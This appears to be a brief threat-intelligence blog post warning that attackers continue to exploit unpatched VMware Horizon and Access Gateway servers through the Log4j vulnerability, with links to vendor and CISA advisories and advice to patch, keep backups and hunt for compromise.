Corvus Threat Intel
Did you already forget about Log4j? Well, threat actors haven’t.
Cybercriminals have continued to exploit vulnerable VMWare Horizon and United Access Gateway servers that did not apply patches or workarounds for Log4j (CVE-2021-44228).
This includes suspected state-sponsored APT groups as well as ransomware operators. Yesterday’s 0-day is today’s compromise.
Organizations employing the affected systems should immediately apply the vendor-recommended patches or utilize temporary workarounds if unable to update right away.
- (See VMware security advisory: https://www.vmware.com/security/advisories/VMSA-2021-0028.html)
As always, ensure proper backup cadence.
CISA recommends all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA (https://www.cisa.gov/uscert/ncas/alerts/aa22-174a).
This blog post and its contents are intended for general guidance and informational purposes only. This blog post is under no circumstances intended to be used or considered as specific insurance or information security advice.
Hive ransomware makes a profit, phishing for the holidays, and Amazon RDS leaks personal data.
Attackers are exploiting zero-days faster, Citrix vulnerability, and SEO poisoning attack.